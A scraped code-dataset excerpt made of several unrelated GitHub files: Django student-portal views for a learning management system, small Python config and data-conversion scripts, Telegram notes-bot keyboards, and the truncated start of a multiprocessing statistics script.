ONE_HOUR:\n date_format = '%Y-%m-%d,%H:00:00'\n else:\n raise Exception('Unsupported interval')\n return date_format\n\n def _get_history(self, currency_pair, interval, start):\n path_name = FILE_FORMAT.format(currency_pair=currency_pair, interval=interval)\n try:\n with open(path_name) as f:\n print('Using saved data')\n history_dict = json.load(f)\n except FileNotFoundError:\n print('No save data found\\nPulling data...')\n dat = HistoricalData(currency_pair, interval, start).retrieve_data()\n hist = {}\n for index, row in dat.iterrows():\n hist[row.name.strftime(self.date_format)] = row['close']\n self._save_history(hist, path_name)\n history_dict = hist\n return history_dict\n\n def _save_history(self, history, path_name):\n with open(path_name, 'w') as fp:\n json.dump(history, 
fp)\n","repo_name":"kperilla/CryptoGainsTracker","sub_path":"src/price_history.py","file_name":"price_history.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10736383616","text":"from django.http import JsonResponse,HttpResponse\nfrom django.shortcuts import redirect, render, redirect\nfrom django.contrib.auth import get_user_model\nfrom apps.sitlms_app.models import Course_Enrollment, Students_Auth, Student_Enrollment, Student_Profile, Program, Course_Catalog,Instructor_Auth, SubmitIssue, Schedule, Notification\nfrom django.conf import settings\nimport os,json\nfrom apps.sitlms_instructor.models import Activity_Comments, ActivityPrivateComments, Course_Activity\nfrom django.core.exceptions import PermissionDenied\nfrom django.contrib.auth.decorators import user_passes_test\nfrom apps.sitlms_student.forms import ActivitySubmissionUploadForm\nfrom apps.sitlms_student.models import Activity_Submission\nfrom django.utils import timezone\nfrom datetime import datetime, timedelta, date as date2\nfrom django.contrib.auth.models import User\nfrom apps.sitlms_instructor.models import Course_Announcement\nfrom operator import itemgetter\nfrom calendar import monthcalendar\nimport calendar\nfrom django.template.loader import render_to_string\nfrom dateutil.relativedelta import relativedelta\nfrom django.contrib import messages\nimport re\n# Create your views here.\n\ndef is_student(user):\n try:\n if hasattr(user,'students_auth'):\n return True\n raise PermissionDenied\n except Exception as e:\n raise PermissionDenied\n \ndef is_correct_student_cbatch_id(student, cbatch_id):\n try:\n # print(student)\n # print(Student_Enrollment.objects.filter(course_batch=cbatch_id).values('student_id'))\n # print('-')\n if Student_Enrollment.objects.filter(course_batch=cbatch_id, student_id=student).exists():\n pass\n else:\n return True\n except Exception as e:\n return True\n\n@user_passes_test(is_student) \ndef custom_403_2(request):\n # Pag pinasa ko with status=403, ayaw magload ng page :(\n # Dapat ganito: render(request, 'custom_403_1.html', status=403)\n return render(request, 'custom_403_2.html')\n\n\n\n@user_passes_test(is_student) \ndef student_view_course(request,id):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n\n \"\"\"This function displays the announcements, students, and additional information per course enrolled of the user\"\"\"\n\n course_batch = id\n user = request.user\n query = get_user_model().objects.filter(id=user.id)\n user_id = query.first().id\n\n \"\"\"Details for Announcement Section\"\"\"\n announcement_details = Course_Announcement.objects.filter(course_batch = id).order_by(\"-date_posted\").values()\n\n \"\"\"Details for Course Info Section\"\"\"\n course_details = Course_Enrollment.objects.filter(course_batch=id).values()\n instructor_id = course_details[0]['instructor_id_id']\n instructor_details = Instructor_Auth.objects.get(id=instructor_id)\n instructor_name = f\"{instructor_details.user.first_name} {instructor_details.user.last_name}\"\n \n\n \n \"\"\"Details for Classmates Section\"\"\"\n student_ids_enrolled = Student_Enrollment.objects.values_list('student_id').filter(course_batch=id)\n student_details = Students_Auth.objects.filter(id__in=student_ids_enrolled).exclude(user_id=user_id).values().order_by('id')\n program_ids = student_details.values_list('program_id_id')\n program_code = 
Program.objects.filter(program_id__in=program_ids).values()\n\n    count = len(student_details)\n    complete_student_details = list()\n    for x in range(count):\n        for program in program_code:\n            if student_details[x]['program_id_id'] == program['program_id']:\n                name = Students_Auth.objects.get(id=student_details[x]['id'])\n                student_full_name = {'full_name':f\"{name.user.first_name} {name.user.last_name}\", 'last_name':name.user.last_name}\n                complete_student_details.append({**student_details[x], **program, **student_full_name})\n\n    complete_student_details = sorted(complete_student_details, key=itemgetter('last_name'))\n    enrolled_class = Student_Enrollment.objects.filter(course_batch=id)\n    # print(enrolled_class)\n    class_details = Course_Activity.objects.filter(course_batch=id)\n    details_expanded = []\n    for act in class_details:\n        if Activity_Submission.objects.filter(course_activity=act, student_id=request.user.students_auth).exists():\n            grade = Activity_Submission.objects.get(course_activity=act, student_id=request.user.students_auth).grade\n            if grade is None:\n                grade = 'Not graded yet'\n        else:\n            grade = 'Not handed in'\n        details_expanded.append({'act':act, 'grade':grade})\n    context = {\n        'course_batch': course_batch,\n        'announcement_details':announcement_details,\n        'course_details':course_details,\n        'classmate_details':complete_student_details,\n        'instructor_name':instructor_name,\n        'class':enrolled_class,\n        'details':details_expanded,\n        'id':id,\n    }\n    return render(request, 'student_module/view_courses.html', context)\n\n# def student_edit_profile(request):\n    \n#     \"\"\" This function renders the student edit profile\"\"\"\n#     user = request.user\n#     query = get_user_model().objects.filter(id=user.id)\n#     user_id = query.first().id\n#     student_id = Students_Auth.objects.get(user=user_id)\n#     student_courses = Student_Enrollment.objects.filter(student_id=student_id).values()\n#     enrolled_courses = Student_Enrollment.objects.filter(student_id=student_id).count\n#     # print(student_courses)\n    \n\n#     context = {\n#         'stud_id':student_id,\n#         'course_count':enrolled_courses,\n#         'course_enrolled_list':student_courses,\n\n#     }\n#     return render(request, 'student_module/edit_profile.html',context)\n\n\n\n    \n    \n    \n\n\"\"\"No longer needed since the folder creation is already handled inside edit_student_profile.\"\"\"\n# def create_student_photo_folder():\n    \n#     \"\"\" This function will create the folder for student profile pic storage\"\"\"\n    \n#     folder_path = os.path.join(settings.MEDIA_ROOT, 'student_photo')\n#     if not os.path.exists(folder_path):\n#         os.makedirs(folder_path)\n    \n@user_passes_test(is_student)\ndef student_profile(request):\n    \n    \"\"\" This function renders the student page \"\"\"\n\n    with open('./static/holidays.json', 'r') as openfile:\n        sample_holiday_list = json.load(openfile)\n    \n    user = request.user\n    queryset = get_user_model().objects.filter(id=user.id)\n    user_id = queryset.first().id\n\n    # adds notif counts\n    notifs = Notification.objects.filter(is_read=False, recipient_id=user_id).order_by('-timestamp').values()\n    count_notifs = notifs.count()\n\n\n    student_auth_details = Students_Auth.objects.get(user_id=user_id)\n\n    courses = Student_Enrollment.objects.filter(student_id=student_auth_details).values()\n    enrolled_courses = Student_Enrollment.objects.filter(student_id=student_auth_details).count\n\n    program_id = student_auth_details.program_id_id\n    program = Program.objects.get(program_id=program_id)\n    \n    ongoing_count = Student_Enrollment.objects.filter(student_id=student_auth_details, 
status='Ongoing').count()\n    completed_count = Student_Enrollment.objects.filter(student_id=student_auth_details, status='Completed').count()\n    total_count = ongoing_count + completed_count\n    \n    ongoing_enrollments = Student_Enrollment.objects.filter(student_id=student_auth_details, status='Ongoing')\n    # for enrollment in ongoing_enrollments:\n    #     print(f\"Enrollment ID {enrollment.enrollment_id}, Course Batch: {enrollment.course_batch}\")\n    \n    ## Schedule\n    student_id = Students_Auth.objects.get(user=user_id)\n    student_courses = Student_Enrollment.objects.filter(student_id=student_id).values()\n    enrolled_courses = Student_Enrollment.objects.filter(student_id=student_id).count\n\n    course_batch_list = student_courses.values_list('course_batch_id') # get course_batch\n    # get course details using course_batch\n    course_details = Course_Enrollment.objects.filter(course_batch__in=course_batch_list).values()\n    # course_details = [x for x in course_details] # convert query set to list\n    course_detail_list = []\n    detail_count = len(course_details)\n\n    # get course title and course description\n    course_ids = Course_Enrollment.objects.filter(course_batch__in=course_batch_list).values('course_id_id')\n    course_desc = Course_Catalog.objects.filter(course_id__in=course_ids).values()\n\n\n    # change the colors here to match calendar.html\n    sample_colors = [\n        \"#800000\", \"#722F37\", \"#800020\", \"#C8385A\", \"#7B0000\", \"#B03060\", \"#800000\", \"#800000\"\n    ]\n\n\n    event_list = []\n\n    for i in sample_holiday_list:\n        item = {}\n        item['start'] = str(i)\n        item['title'] = sample_holiday_list[i]['description']\n        item['color'] = '#1C0118' # holiday background color\n        event_list.append(item)\n\n    for x in range(detail_count):\n        course_id = course_details[x]['course_id_id']\n        course_batch = course_details[x]['course_batch']\n        schedules = Schedule.objects.filter(course_batch=course_batch).values()\n        instructor_id = course_details[x]['instructor_id_id']\n        user_id = Instructor_Auth.objects.get(id=instructor_id).user_id\n        firstname = User.objects.get(id=user_id).first_name\n        lastname = User.objects.get(id=user_id).last_name\n\n        start_time = course_details[x]['start_time']\n        end_time = course_details[x]['end_time']\n\n        for i in schedules:\n            item = {}\n            session_date_str = str(i['session_date'])\n            if session_date_str in sample_holiday_list:\n                continue\n            item['start'] = datetime.combine(i['session_date'], start_time).isoformat()\n            item['end'] = datetime.combine(i['session_date'], end_time).isoformat()\n            item['fullname'] = f'{firstname} {lastname}'\n            item['title'] = course_details[x]['course_batch']\n            item['course_id'] = course_details[x]['course_id_id']\n            item['full_desc'] = Course_Catalog.objects.get(course_id=course_id).course_desc # add course desc to dictionary\n            item['url'] = course_details[x]['session_details'].lower()\n            item['course_batch'] = course_batch\n\n            try:\n                item['color'] = sample_colors[x]\n            except IndexError:\n                item['color'] = '#A70000'\n\n            event_list.append(item)\n\n        \n        \"\"\" Adding Course Desc and Course Title in Context\"\"\"\n        for item in course_desc:\n            if course_details[x]['course_id_id'] == item['course_id']:\n                course_detail_list.append({**course_details[x], **item})\n\n    student_details = {'first_name':student_auth_details.user.first_name, \n                       'last_name':student_auth_details.user.last_name,\n                       'program_title':program.program_title,\n                       'ongoing_count':ongoing_count,\n                       'completed_count':completed_count,\n                       'total_count':total_count, \n                       }\n\n    # # Get the current date from the URL parameters\n    # date_str = 
request.GET.get('date', datetime.now().strftime('%Y-%m-%d'))\n # date = datetime.strptime(date_str, '%Y-%m-%d')\n\n # # Calculate the previous and next month values\n # prev_month = date - relativedelta(months=1)\n # next_month = date + relativedelta(months=1)\n\n # prev_date = prev_month.replace(day=1).strftime('%Y-%m-%d')\n # next_date = next_month.replace(day=1).strftime('%Y-%m-%d')\n\n # # Generate the calendar data for the specified month\n # cal = calendar.monthcalendar(date.year, date.month)\n\n # # Get the current month's name and year\n # month_name = date.strftime('%B')\n # year = date.year\n\n\n # for i in event_list:\n # print(i)\n # print(\"---\")\n \n \n # Render the calendar template with the calendar data, navigation parameters, month name/year, and events\n return render(request, 'student_module/student.html', {\n # 'prev_date': prev_date,\n # 'next_date': next_date,\n # 'month_name': month_name,\n # 'year': year,\n 'student_details': student_details,\n 'course_enrolled_list':courses,\n 'stud_id':user_id,\n 'course_count':enrolled_courses,\n 'scheduled_course':course_detail_list,\n 'event_list':json.dumps(event_list),\n 'notifs': notifs,\n 'count_notifs': count_notifs\n })\n # Render the calendar template with the calendar data, navigation parameters, month name/year, and events\n return render(request, 'student_module/student.html',context)\n\n\n\n\n\n@user_passes_test(is_student) \ndef student_view_assignment_details(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n user = request.user\n batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk)\n comment_items = Activity_Comments.objects.filter(course_activity=activity).order_by('timestamp')\n if activity.activity_attachment:\n file_relative_url = activity.activity_attachment.url \n file_url = request.build_absolute_uri(file_relative_url)\n else:\n file_url = False\n submission_grade = False\n submission_on_time = False\n private_comments = ActivityPrivateComments.objects.filter(course_activity=Course_Activity.objects.get(id=pk),student=request.user.students_auth,).order_by(\"timestamp\")\n if Activity_Submission.objects.filter(course_activity=activity,student_id=user.students_auth).values('activity_file').exists():\n submission_instance = Activity_Submission.objects.filter(course_activity=activity,student_id=user.students_auth).last()\n current_submission = submission_instance.activity_file\n initial_data = {'activity_file': current_submission}\n current_submission_filename = str(current_submission).split('/')[-1]\n # submission_upload_form = ActivitySubmissionUploadForm(initial=initial_data)\n #activity_file=current_submission\n submission_upload_form = ActivitySubmissionUploadForm()\n submission_grade = submission_instance.grade\n submission_on_time = True if submission_instance.date_submitted < activity.deadline else False\n # print(submission_instance.date_submitted)\n # print(activity.deadline)\n else:\n current_submission_filename = False\n submission_upload_form = ActivitySubmissionUploadForm()\n context = {\n 'batch':batch,\n 'act':activity,\n 'cmt':comment_items,\n 'file_url':file_url,\n 'user':user,\n 'submission_upload_form':submission_upload_form,\n 'current_submission_filename':current_submission_filename,\n 'submission_grade':submission_grade,\n 'submission_on_time': submission_on_time,\n 'private_comments':private_comments,\n }\n if request.method == \"POST\":\n msg = request.POST['msg_area']\n 
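# Save the new comment with the current timestamp, then redirect back to this view (post/redirect/get) so a refresh does not re-submit the form.\n        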
user = request.user\n comment = Activity_Comments(course_activity = activity, uid = user,content = msg, timestamp=timezone.now())\n comment.save()\n return redirect('student_view_assignment_details',id=id,pk=pk)\n \n return render(request, 'student_module/assignment_details.html',context)\n\n@user_passes_test(is_student) \ndef upload_activity_submission(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n # Will try one file upload muna \n student = request.user.students_auth\n # course_batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk)\n if request.method == 'POST':\n form = ActivitySubmissionUploadForm(request.POST, request.FILES)\n if form.is_valid():\n prev_instances=Activity_Submission.objects.filter(course_activity=activity,student_id=student)\n if prev_instances:\n for prev_i in prev_instances:\n file_path = prev_i.activity_file.path\n if os.path.isfile(file_path):\n os.remove(file_path)\n prev_instances.delete()\n attachment=request.FILES['activity_file']\n instance = Activity_Submission(course_activity=activity,student_id=student,activity_file=attachment, date_submitted=timezone.now())\n instance.save()\n return redirect('student_view_assignment_details',id=id,pk=pk)\n else:\n for x,y in form.errors.items():\n y=re.sub(\"<.*?>\", '', str(y))\n messages.error(request, y)\n return redirect('student_view_assignment_details',id=id,pk=pk)\n\n@user_passes_test(is_student) \ndef download_activity_attachment(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n # batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk) # Retrieve the object with the uploaded file\n\n # Perform any necessary checks or validations here\n\n # Retrieve the file path or file object from the model and open it\n file_path = activity.activity_attachment.path\n # print(file_path)\n file = open(file_path, 'rb')\n\n # Set the appropriate response headers\n filename=str(activity.activity_attachment.name).split('/')[-1]\n response = HttpResponse(file, content_type='application/octet-stream')\n response['Content-Disposition'] = f'attachment; filename=\"{filename}\"'\n\n return response\n\n@user_passes_test(is_student) \ndef download_activity_submission(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n student = request.user.students_auth\n course_batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk)\n submission = Activity_Submission.objects.filter(course_activity=activity,student_id=student).last()\n # print(submission)\n file_path = submission.activity_file.path\n # print(file_path)\n file = open(file_path, 'rb')\n\n # Set the appropriate response headers\n filename=str(submission.activity_file.name).split('/')[-1]\n response = HttpResponse(file, content_type='application/octet-stream')\n response['Content-Disposition'] = f'attachment; filename=\"{filename}\"'\n\n return response\n\n@user_passes_test(is_student) \ndef student_course_details(request):\n \n \"\"\" This function renders the student page course details \"\"\"\n \n return render(request, 'student_module/courses_details.html')\n\n\ndef edit_student_comment(request, id , pk, fk):\n batch = Course_Enrollment.objects.get(pk=id)\n activity = Course_Activity.objects.get(id=pk) \n comment_id = 
Activity_Comments.objects.get(id=fk)\n context = {\n 'batch':batch,\n 'act':activity,\n 'comment':comment_id,\n }\n if request.method == 'POST':\n person = request.POST['target']\n user = request.user\n msg = request.POST['txtmsg']\n comment_id.uid = user\n comment_id.content = msg\n comment_id.timestamp = timezone.now()\n comment_id.save(update_fields=['uid','content','timestamp'])\n return redirect('student_view_assignment_details', id=id,pk=pk)\n return render(request, \"student_module/edit_comments.html\", context)\n\ndef delete_student_comment(request, id, pk, fk):\n batch = Course_Enrollment.objects.get(pk=id)\n act= Course_Activity.objects.get(id=pk)\n comment_id = Activity_Comments.objects.get(id=fk)\n context = {\n 'batch':batch,\n 'act':act,\n 'comment':comment_id,\n 'id':id,\n }\n if request.method == 'POST':\n comment_id.delete()\n return redirect('student_view_assignment_details',id=id,pk=pk)\n return render(request, 'student_module/delete_comments.html',context)\n\n\n@user_passes_test(is_student) \ndef student_edit_profile(request):\n \n user = request.user\n queryset = get_user_model().objects.filter(id=user.id)\n user_id = queryset.first().id\n\n #adds notif counts\n notifs =Notification.objects.filter(is_read=False, recipient_id=user_id).order_by('-timestamp').values()\n count_notifs = notifs.count()\n\n \"\"\" This function renders the student edit profile\"\"\"\n student_auth_details = Students_Auth.objects.get(user_id=user_id)\n # print(student_auth_details.user_id, user_id)\n \n if user_id in Student_Profile.objects.values_list('user_id', flat=True):\n student_profile = Student_Profile.objects.get(user_id=user_id)\n student_profile.profile_pic = str(student_profile.profile_pic).replace(\"\\\\\",\"/\")\n student_profile.save()\n \n\n \n student_details ={ 'first_name':student_auth_details.user.first_name, \n 'middlename':student_auth_details.middlename,\n 'last_name':student_auth_details.user.last_name,\n 'birthdate':student_auth_details.birthdate,\n 'bio':student_profile.bio,\n 'address':student_profile.address,\n 'user_contact_no':student_profile.user_contact_no,\n 'emergency_contact':student_profile.emergency_contact,\n 'emergency_contact_no':student_profile.emergency_contact_no,\n 'profile_pic':student_profile.profile_pic,\n 'email': student_auth_details.user.username,\n 'emp_no': student_auth_details.student_no\n } \n \n else:\n student_details ={ 'first_name':student_auth_details.user.first_name, \n 'middlename':student_auth_details.middlename,\n 'last_name':student_auth_details.user.last_name,\n 'birthdate':student_auth_details.birthdate,\n 'bio':\"\",\n 'address':\"\",\n 'user_contact_no':\"\",\n 'emergency_contact':\"\",\n 'emergency_contact_no':\"\",\n 'profile_pic':\"\",\n 'email': student_auth_details.user.username,\n 'emp_no': student_auth_details.student_no\n } \n \n \n \n context = {'student_details': student_details,\n 'notifs': notifs,\n 'count_notifs': count_notifs\n }\n\n if request.method == 'POST':\n first_name = request.POST['first_name']\n middlename = request.POST['middlename']\n last_name = request.POST['last_name']\n birthdate = request.POST['birthdate']\n bio = request.POST['bio']\n address = request.POST['address']\n user_contact_no = request.POST['user_contact_no']\n emergency_contact = request.POST['emergency_contact']\n emergency_contact_no = request.POST['emergency_contact_no']\n \n \n profile_pic = False\n\n if 'profile_pic' in request.FILES:\n profile_picture = request.FILES['profile_pic']\n profile_pic = 
f\"{user_id}{os.path.splitext(profile_picture.name)[1]}\"\n\n\n if profile_pic:\n static_dirs = settings.STATICFILES_DIRS # Get the STATICFILES_DIRS list from Django settings\n student_pic_folder = os.path.join(static_dirs[0], 'student_pic')\n os.makedirs(student_pic_folder, exist_ok=True)\n\n file_path = os.path.join(student_pic_folder, profile_pic)\n \n with open(file_path, 'wb') as destination:\n for chunks in profile_picture.chunks():\n destination.write(chunks)\n\n\n\n student_auth_details.user.first_name = first_name\n student_auth_details.middlename = middlename\n student_auth_details.user.last_name = last_name\n student_auth_details.birthdate = birthdate\n\n if user_id in Student_Profile.objects.values_list('user_id', flat=True):\n # student_profile = Student_Profile.objects.get(user_id=user_id)\n # print(\"I entered in line 152\")\n student_profile.bio = bio\n student_profile.address = address\n student_profile.user_contact_no = user_contact_no\n student_profile.emergency_contact = emergency_contact\n student_profile.emergency_contact_no = emergency_contact_no\n\n # enters here if there is a record in student_profile, used only for updating profile pic\n if profile_pic:\n student_profile.profile_pic = str(os.path.join(settings.STATIC_URL, 'student_pic', profile_pic)).replace(\"\\\\\",\"/\")\n\n else:\n # enters here if there is no record yet in student_profile\n\n if profile_pic:\n student_profile = Student_Profile(\n bio=bio,\n address=address,\n user_contact_no=user_contact_no,\n emergency_contact=emergency_contact,\n emergency_contact_no=emergency_contact_no,\n user_id=user_id,\n profile_pic=str(os.path.join(settings.STATIC_URL, 'student_pic', profile_pic)).replace(\"\\\\\",\"/\")\n )\n else:\n student_profile = Student_Profile(\n bio=bio,\n address=address,\n user_contact_no=user_contact_no,\n emergency_contact=emergency_contact,\n emergency_contact_no=emergency_contact_no,\n user_id=user_id,\n profile_pic=os.path.join(settings.STATIC_URL, 'student/assets/imgs/profile.png')\n )\n\n \n student_profile.save()\n student_auth_details.user.save()\n student_auth_details.save()\n \n\n return redirect('/sit-student/student_profile')\n \n return render(request, 'student_module/edit_profile.html', context) \n\ndef report_issues(request):\n user = request.user\n queryset = get_user_model().objects.filter(id=user.id)\n user_id = queryset.first().id\n\n if request.method == \"POST\":\n student_report_issues = Students_Auth.objects.get(user_id=user_id)\n firstname = User.objects.get(id=user_id).first_name\n lastname = User.objects.get(id=user_id).last_name\n student_access = student_report_issues.access_type\n subject = request.POST['inputsubject']\n msg = request.POST['contact-message']\n\n issue = SubmitIssue(sender_firstname = firstname,sender_lastname = lastname,sender_access_type= student_access,sender_subject = subject,sender_message = msg)\n issue.save()\n #DEBUG\n # print(f'{firstname} | {lastname} | {student_access}')\n # print(f'{subject} \\n {msg}')\n return redirect('/sit-student/student_profile')\n\n@user_passes_test(is_student)\ndef add_private_comment_student(request, id, pk):\n if is_correct_student_cbatch_id(request.user.students_auth, id):\n return redirect(\"student-no-access\")\n if request.method==\"POST\":\n instance = ActivityPrivateComments(course_activity=Course_Activity.objects.get(pk=pk),student=request.user.students_auth,uid=request.user,content=request.POST.get(\"comment_content\"))\n instance.save()\n return redirect('student_view_assignment_details', 
id=id,pk=pk)\n\n@user_passes_test(is_student)\ndef delete_private_comment_student(request, id, pk, comment_id):\n    if is_correct_student_cbatch_id(request.user.students_auth, id):\n        return redirect(\"student-no-access\")\n    instance = ActivityPrivateComments.objects.get(pk=comment_id)\n    if instance.uid != request.user:\n        return redirect(\"student-no-access\")\n    instance.delete()\n    return redirect('student_view_assignment_details', id=id,pk=pk)\n\n\ndef read_notif(request, id):\n    notifications = Notification.objects.get(id=id)\n    notifications.is_read = True\n    notifications.save()\n    course_title = notifications.message.split()[3]\n    full_name = notifications.message.split()[5:] #['Apolinario', 'Jaime', 'Mabini']\n    last_name = full_name[-1] #Mabini\n    first_name = ' '.join(full_name[:-1]) #'Apolinario Jaime'\n    instructor_id = User.objects.get(first_name=first_name, last_name=last_name).id\n    instructor_id = Instructor_Auth.objects.get(user_id=instructor_id).id\n    course_id = Course_Catalog.objects.get(course_title=course_title).course_id\n    course_batch = Course_Enrollment.objects.get(course_id_id=course_id, instructor_id_id=instructor_id).course_batch\n\n    if notifications.notif_type == \"Post Assignment\":\n        return redirect(\"view_courses\", id=course_batch)\n    \n    # return redirect (\"student_profile\")","repo_name":"pamsacdalan/frontend","sub_path":"apps/sitlms_student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17217981657","text":"IDX_CLASS_LABELS = {\n    0: 'AnnualCrop',\n    1: 'Forest', \n    2: 'HerbaceousVegetation',\n    3: 'Highway',\n    4: 'Industrial',\n    5: 'Pasture',\n    6: 'PermanentCrop',\n    7: 'Residential',\n    8: 'River',\n    9: 'SeaLake'\n}\n\nPATH = 'C:/Users/aacer/PycharmProjects/PFE_IVA/river.jpg'\nMODEL_PATH = 'C:/Users/aacer/PycharmProjects/PFE_IVA/lulc_max_acc.pth'\nNUM_CLASSES = 10\n","repo_name":"AzzedineNed/Multispectral-Land-Cover-Classification","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"785562696","text":"import json\nimport pandas as pd\n\ndef cleanText(text):\n    return text.replace('\\xa0', ' ')\n\ndef readFile(fileName):\n    return tuple(open(fileName, 'r'))\n\ndef findById(id, array):\n    for i in range(0, len(array)):\n        if array[i][\"id\"] == id:\n            return i\n    return -1\n\ndef loadTruthFile(fileName):\n    truth = []\n    truthLines = readFile(fileName)\n    for line in truthLines:\n        lineJson = json.loads(line)\n        id = lineJson[\"id\"]\n        result = lineJson[\"truthClass\"]\n        truth.append({\"id\": id, \"result\": result})\n    return truth\n\ndef loadInstances(fileName, truth):\n    allData = []\n    instanceLines = readFile(fileName)\n    for line in instanceLines:\n        lineJson = json.loads(line)\n        id = lineJson[\"id\"]\n        truthId = findById(id, truth)\n        if truthId == -1:\n            print(\"id not found\")\n            continue\n        result = truth[truthId][\"result\"]\n        title = cleanText(lineJson[\"targetTitle\"])\n        keywords = cleanText(lineJson[\"targetKeywords\"])\n        description = cleanText(lineJson[\"targetDescription\"])\n        text = \"\"\n        for par in lineJson[\"targetParagraphs\"]:\n            text = text + (cleanText(par)+\"\\n\")\n        text = text[:-1]\n        allData.append({\"id\": id, \"result\": result, \"title\": title, \"keywords\": keywords, \"description\": description, \"text\": text})\n    return allData\n\n\ntruth = loadTruthFile(\"truth.jsonl\")\nnews = 
loadInstances(\"instances.jsonl\", truth)\npd.DataFrame(news).to_csv('trainingDataSet.csv', index=False, header=False)\n\n","repo_name":"hasbisevinc/ClickBait-Detector","sub_path":"training/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"20838850955","text":"from aiogram.types import ReplyKeyboardMarkup, ReplyKeyboardRemove, KeyboardButton, InlineKeyboardMarkup, \\\n InlineKeyboardButton, CallbackQuery\nfrom aiogram.utils.keyboard import KeyboardBuilder, InlineKeyboardBuilder\nfrom mongo_db_op import database_operations\n\n\ndef get_notes_kb(username: str) -> InlineKeyboardMarkup:\n notes = database_operations.get_notes(username)\n builder = InlineKeyboardBuilder()\n\n for note in notes:\n builder.button(text=f\"📔{note['title']}\",\n callback_data=f\"note: {note['_id']}\")\n\n builder.button(text='âž•',\n callback_data='add_note_btn')\n builder.button(text='refresh',\n callback_data='refresh_btn')\n builder.button(text='search🔎',\n callback_data='search_note_btn')\n builder.adjust(1, True)\n markup = InlineKeyboardMarkup(inline_keyboard=builder.export())\n return markup\n\n\ndef get_note_operations_kb(note_id):\n ikb = InlineKeyboardMarkup(inline_keyboard=[\n [InlineKeyboardButton(text=\"edit\", callback_data=f'edit_note: {note_id}'),\n InlineKeyboardButton(text=\"delete\", callback_data=f'delete_note: {note_id}')],\n [InlineKeyboardButton(text=\"last edit\", callback_data=f'last_edit: {note_id}')],\n [InlineKeyboardButton(text=\"add user\", callback_data=f'add_user: {note_id}')],\n [InlineKeyboardButton(text=\"🔙\", callback_data='back_from_note')]\n ])\n return ikb\n\n\ndef get_edit_note_kb(note_id):\n ikb = InlineKeyboardMarkup(inline_keyboard=[\n [InlineKeyboardButton(text=\"edit title\", callback_data=f'edit_note_title: {note_id}'),\n InlineKeyboardButton(text=\"edit text\", callback_data=f'edit_note_text: {note_id}')],\n [InlineKeyboardButton(text=\"🔙\", callback_data=f'back_from_note_edit: {note_id}')]\n ])\n return ikb\n\n\ndef get_searched_notes_kb(username: str, text: str) -> InlineKeyboardMarkup:\n notes = database_operations.search_note(username, text)\n\n builder = InlineKeyboardBuilder()\n\n for note in notes:\n builder.button(text=f\"📔{note['title']}\",\n callback_data=f\"note: {note['_id']}\")\n\n builder.button(text='🔙',\n callback_data='back_from_search')\n builder.adjust(1, True)\n markup = InlineKeyboardMarkup(inline_keyboard=builder.export())\n return markup\n\n\ndef get_back_btn_to_lastedit_kb(note_id: str) -> InlineKeyboardMarkup:\n ikb = InlineKeyboardMarkup(inline_keyboard=[\n [InlineKeyboardButton(text=\"🔙\", callback_data=f'back_from_last_edit: {note_id}')]\n ])\n return ikb","repo_name":"MalakaVoid/Note-TG-bot","sub_path":"keyboards/user_keyboards.py","file_name":"user_keyboards.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37737385230","text":"#############################################################################################################################################################################################################\n#############################################################################################################################################################################################################\n### 把 kong_model2 加入 sys.path\nimport os\ncode_exe_path = 
os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path\ncode_exe_path_element = code_exe_path.split(\"\\\\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層\nkong_layer = code_exe_path_element.index(\"kong_model2\") ### 找出 kong_model2 在第幾層\nkong_model2_dir = \"\\\\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir\nimport sys ### 把 kong_model2 加入 sys.path\nsys.path.append(kong_model2_dir)\nsys.path.append(kong_model2_dir + \"/kong_util\")\n# print(__file__.split(\"\\\\\")[-1])\n# print(\" code_exe_path:\", code_exe_path)\n# print(\" code_exe_path_element:\", code_exe_path_element)\n# print(\" kong_layer:\", kong_layer)\n# print(\" kong_model2_dir:\", kong_model2_dir)\n#############################################################################################################################################################################################################\nfrom kong_util.util import get_exr\nfrom kong_util.multiprocess_util import multi_processing_interface\nfrom kong_util.wc_util import wc_3d_plot, wc_2d_plot, uv_2d_plot\nfrom kong_util.build_dataset_combine import Check_dir_exist_and_build, Check_dir_exist_and_build_new_dir, Save_as_jpg, Save_npy_path_as_knpy\nfrom multiprocessing import Manager\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\ndef F_ow_W_ch_min_max(data_paths, task_amount, core_amount=10, print_msg=False):\n start_time = time.time()\n with Manager() as manager: ### 設定在 multiprocess 裡面 共用的 list\n ### 以下想 multiprocess\n ### global 的 list,應該就要用 share memory 了\n ch0_maxs = manager.list() # []的概念\n ch0_mins = manager.list() # []的概念\n ch1_maxs = manager.list() # []的概念\n ch1_mins = manager.list() # []的概念\n ch2_maxs = manager.list() # []的概念\n ch2_mins = manager.list() # []的概念\n _F_ow_W_ch_min_max_multiprocess(data_paths, ch0_maxs, ch0_mins, ch1_maxs, ch1_mins, 